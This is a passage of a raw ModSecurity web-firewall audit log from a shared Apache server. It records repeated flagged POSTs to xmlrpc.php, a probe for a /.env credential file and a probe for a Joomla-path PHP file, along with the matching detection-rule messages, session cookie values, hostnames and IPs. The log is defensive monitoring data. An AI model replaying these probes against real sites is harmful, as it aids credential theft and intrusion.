wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e885bad97df5af6ef8c43c44bccab6%7C%7C1750160594%7C%7C1750156994%7C%7Cac1109a1a20f5c2933cc045f0a2658ad; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d28300e89d0aee72a535e97063dbf64b%7C%7C1750160594%7C%7C1750156994%7C%7C23240c5c9c555b5ede16ff30a195d0c7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --3f69585a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=7evedsavbaoei4302pl474ma95; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_8c51c58b31fbf68c091be7575f110b%7C%7C1750160595%7C%7C1750156995%7C%7C61723bd14c47486adb22a994c126bbe1; expires=Tue, 17 Jun 2025 11:43:15 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=796036097f5bc13f3a816f5d314e4b06%7C%7C1750160596%7C%7C1750156996%7C%7Cc2ff72e66ba39ec412c575a46d5f7da7; expires=Tue, 17 Jun 2025 11:43:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --3f69585a-E-- --3f69585a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6x00ca6QMKkQvLlAAqqgAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987795100083 1100866 (- - -) Stopwatch2: 1749987795100083 1100866; combined=2883, p1=431, p2=2068, p3=88, p4=31, p5=164, sr=129, sw=101, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3f69585a-Z-- --0c84fb53-A-- [15/Jun/2025:17:13:19.070562 +0530] aE6x1lCip1xXG9qkRMducgAAAAc 52.169.21.22 56248 127.0.0.1 7081 --0c84fb53-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 52.169.21.22 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --0c84fb53-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Connection: close Content-Type: text/html; charset=UTF-8 --0c84fb53-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "archangledesignstudio.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE6x1lCip1xXG9qkRMducgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987798234754 835868 (- - -) Stopwatch2: 1749987798234754 835868; combined=1964, p1=330, p2=1540, p3=0, p4=0, p5=93, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c84fb53-Z-- --476cd729-A-- [15/Jun/2025:17:14:16.177854 +0530] aE6yD3rzia-Xuz8LZxRLIAAAAAg 165.22.247.248 56288 127.0.0.1 7081 --476cd729-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=h7vppgto54m34tfi2ednci5haa; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_82ca7e2a1f38f7338b31a3a62a6cc3%7C%7C1750160654%7C%7C1750157054%7C%7C0245f13653a30e1b46d6812fabaaacfd; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=f17fbe7297ae84ccd266be8604a3e141%7C%7C1750160654%7C%7C1750157054%7C%7C06f45bea5e1ec134457f72f6af14cb81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --476cd729-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=kse3p39t5qfqbr9p0ek762frlj; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_5e7eda3b96a5a9657ab85bf8cb8190%7C%7C1750160655%7C%7C1750157055%7C%7C0d3243c0ad4a7112f0b482ad2ecdca50; expires=Tue, 17 Jun 2025 11:44:15 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=fa17ddecb3cebeffb464953a72f3881b%7C%7C1750160656%7C%7C1750157056%7C%7C13c683bd2dfd3a3e0df00787307afb5d; expires=Tue, 17 Jun 2025 11:44:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --476cd729-E-- --476cd729-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6yD3rzia-Xuz8LZxRLIAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987855151531 1026463 (- - -) Stopwatch2: 1749987855151531 1026463; combined=3014, p1=387, p2=2029, p3=130, p4=60, p5=261, sr=104, sw=147, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --476cd729-Z-- --7b9bd954-A-- [15/Jun/2025:17:14:57.814414 +0530] aE6yOFirsA1ruSKrNWSWJgAAAAQ 45.80.158.38 60776 127.0.0.1 7081 --7b9bd954-B-- GET /.env HTTP/1.0 Host: www.sarvasya.com X-Real-IP: 45.80.158.38 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip --7b9bd954-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.sarvasya.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --7b9bd954-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarvasya.com"] [uri "/.env"] [unique_id "aE6yOFirsA1ruSKrNWSWJgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarvasya.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987896814575 999905 (- - -) Stopwatch2: 1749987896814575 999905; combined=1429, p1=296, p2=1032, p3=0, p4=0, p5=100, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b9bd954-Z-- --23761a22-A-- [15/Jun/2025:17:15:16.022987 +0530] aE6ySw9BijgXpeeI_r_AwQAAAAE 165.22.247.248 49268 127.0.0.1 7081 --23761a22-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=rbnlg9nt5h1hcheqd1l1tll2ss; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_edb6cc791a759dd57fe7d9cae96d31%7C%7C1750160714%7C%7C1750157114%7C%7C7d1c268df09fd629a364c8c3e69c457a; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=8f7f2a5571936a427647fe6fb8e236b8%7C%7C1750160714%7C%7C1750157114%7C%7C0ff0ae497b2bff1a505607a64a712270 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --23761a22-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=46nfe0l47b1vhv49tt8hbf49i8; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_82baf0e1fe3e0e39a21f44fbeecde6%7C%7C1750160715%7C%7C1750157115%7C%7C250e89245d12acafaa0828583ae77af3; expires=Tue, 17 Jun 2025 11:45:15 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=0c60df7f850549fe6fe057773ef9b788%7C%7C1750160715%7C%7C1750157115%7C%7C11fc02d14482a7f0de80abe7ae475040; expires=Tue, 17 Jun 2025 11:45:15 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --23761a22-E-- --23761a22-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6ySw9BijgXpeeI_r_AwQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987915019978 1003089 (- - -) Stopwatch2: 1749987915019978 1003089; combined=2938, p1=402, p2=2142, p3=101, p4=37, p5=161, sr=90, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --23761a22-Z-- --abb12814-A-- [15/Jun/2025:17:16:16.474562 +0530] aE6yh1Cip1xXG9qkRMdu0QAAAAc 165.22.247.248 37702 127.0.0.1 7081 --abb12814-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=dp272130b17cqtrr89h7v1jhe6; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_763b1e6c968e8afddb2fadbe524f01%7C%7C1750160774%7C%7C1750157174%7C%7C33fe103ca55c8247f93292931230dfbd; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=2b1ed458103d8b9b27d580604cc7d7e9%7C%7C1750160775%7C%7C1750157175%7C%7C24cffb50a378cfe75271edd83e36a574 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --abb12814-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=0vkf1qsed1i197ffqui8bmlr16; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c30ef977d9ac175f8be8a863103cc8%7C%7C1750160776%7C%7C1750157176%7C%7C92bf69b0b8292d650ddd6801c9e9029b; expires=Tue, 17 Jun 2025 11:46:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d8c774c9e338f59c04f20940e8f5e4eb%7C%7C1750160776%7C%7C1750157176%7C%7Cab4af556f42ed127e39095e72a14cee1; expires=Tue, 17 Jun 2025 11:46:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --abb12814-E-- --abb12814-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6yh1Cip1xXG9qkRMdu0QAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987975438427 1036224 (- - -) Stopwatch2: 1749987975438427 1036224; combined=2809, p1=347, p2=2063, p3=100, p4=36, p5=164, sr=83, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --abb12814-Z-- --2d6b5d68-A-- [15/Jun/2025:17:17:16.772088 +0530] aE6yw1irsA1ruSKrNWSWYQAAAAQ 165.22.247.248 50342 127.0.0.1 7081 --2d6b5d68-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 Cookie: PHPSESSID=1035ol0h4ujnfm7nd7c2107985; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_1aebd819627488d2c2bcc8abe9da58%7C%7C1750160835%7C%7C1750157235%7C%7Ca87a7a124fa0c5c1815880b7948251e3; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5cbcb29c1f0c7d4e195d7d1cc7fdb421%7C%7C1750160835%7C%7C1750157235%7C%7C33d27d26d403acbe49c58860ac474218 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --2d6b5d68-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=tg121adi97ahqcd6nv40mvo7hn; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_a7edd753f4a92f16037a2c5bce8334%7C%7C1750160836%7C%7C1750157236%7C%7Ce43763cde4cae3192a63a00d40f7aee9; expires=Tue, 17 Jun 2025 11:47:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c1910e962fb8ceab5b91ec4d1b992457%7C%7C1750160836%7C%7C1750157236%7C%7C9b44de52b96fa9871edcaac64b82e6ca; expires=Tue, 17 Jun 2025 11:47:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2d6b5d68-E-- --2d6b5d68-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6yw1irsA1ruSKrNWSWYQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988035687941 1084227 (- - -) Stopwatch2: 1749988035687941 1084227; combined=2888, p1=441, p2=2017, p3=103, p4=39, p5=190, sr=113, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2d6b5d68-Z-- --cde7c445-A-- [15/Jun/2025:17:18:16.273902 +0530] aE6y_w2U8ofTdsKp_yhMYAAAAAU 165.22.247.248 57264 127.0.0.1 7081 --cde7c445-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=03ubp2q28mlm2k1dnst956c5ni; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_7e053e3d140dc2e673cfa5713a3f9d%7C%7C1750160894%7C%7C1750157294%7C%7C62e10669c5a19f9b6eeaa8946fde038f; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=e0c58919f9cffb51c69421fd302a7a20%7C%7C1750160894%7C%7C1750157294%7C%7Cfaed19e2045d64a820460fc548341d84 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --cde7c445-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=tq2elt7es2mbbm6ehm0jhngc7g; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_856f8e3ff0f98c19b2ea218dde97d4%7C%7C1750160896%7C%7C1750157296%7C%7C2834e8ffcf9694ed390e6605170d610e; expires=Tue, 17 Jun 2025 11:48:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=7a0fed879c175317983d501257fad005%7C%7C1750160896%7C%7C1750157296%7C%7C1ec9d2dce1749ef8b3eadfb3caf5a652; expires=Tue, 17 Jun 2025 11:48:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cde7c445-E-- --cde7c445-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6y_w2U8ofTdsKp_yhMYAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988095218401 1055582 (- - -) Stopwatch2: 1749988095218401 1055582; combined=2905, p1=382, p2=2116, p3=105, p4=37, p5=165, sr=91, sw=100, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cde7c445-Z-- --08587c19-A-- [15/Jun/2025:17:19:16.953237 +0530] aE6zOw9BijgXpeeI_r_BJQAAAAE 165.22.247.248 45608 127.0.0.1 7081 --08587c19-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=3lkvdu73b5f69559afgai2kdal; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d1b650c19832cec99374b77f0f6e94%7C%7C1750160955%7C%7C1750157355%7C%7C9394d451b14f5070390cf7b61a9d0201; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=f8773c0de9dd0bfb9008d227572f5a2c%7C%7C1750160955%7C%7C1750157355%7C%7C7425734f556d342473f61cee0663b954 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --08587c19-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=fp0s0k6ra3e3h608d0i88rd5ic; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_4dd54b10d42c519d20da4ddb45cee0%7C%7C1750160956%7C%7C1750157356%7C%7C0dbc5336827663ddd511b487553dadb1; expires=Tue, 17 Jun 2025 11:49:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=626911dc107af8372b8db587a509b134%7C%7C1750160956%7C%7C1750157356%7C%7Ce45b130abe694dda4390c951dc06f5d4; expires=Tue, 17 Jun 2025 11:49:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --08587c19-E-- --08587c19-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6zOw9BijgXpeeI_r_BJQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988155911602 1041757 (- - -) Stopwatch2: 1749988155911602 1041757; combined=2955, p1=433, p2=1961, p3=142, p4=52, p5=228, sr=121, sw=139, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --08587c19-Z-- --fd088d75-A-- [15/Jun/2025:17:20:16.296632 +0530] aE6zd3rzia-Xuz8LZxRLvwAAAAg 165.22.247.248 39240 127.0.0.1 7081 --fd088d75-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=keafe8phb25i0fgcmgqmrasd53; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_1a934886fd308f6ed9249d0f29e059%7C%7C1750161014%7C%7C1750157414%7C%7C974dea0a614f8d4dd17e47aceb54fcbe; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=596fe6ccbae7568c2cf70cc3d7279eb6%7C%7C1750161014%7C%7C1750157414%7C%7Ca4282f5be466b796fc53e723f09600e8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --fd088d75-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=nnsfcntvtckqcsnsg1bqvi1eqb; path=/ Set-Cookie: 